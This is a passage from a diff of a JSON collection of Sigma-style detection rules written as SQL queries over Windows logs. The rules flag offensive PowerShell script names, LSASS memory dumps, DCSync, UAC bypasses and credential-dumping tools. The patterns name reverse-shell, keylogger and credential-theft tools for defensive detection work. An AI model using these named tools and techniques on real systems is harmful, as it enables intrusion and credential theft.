'%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of remote PowerShell execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate used of encrypted ZIP files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", - "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.credential_access", + "attack.execution", "attack.t1003.001", "attack.t1003.002", - "attack.t1003.003", "attack.t1003.004", - "attack.t1003.005" + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' 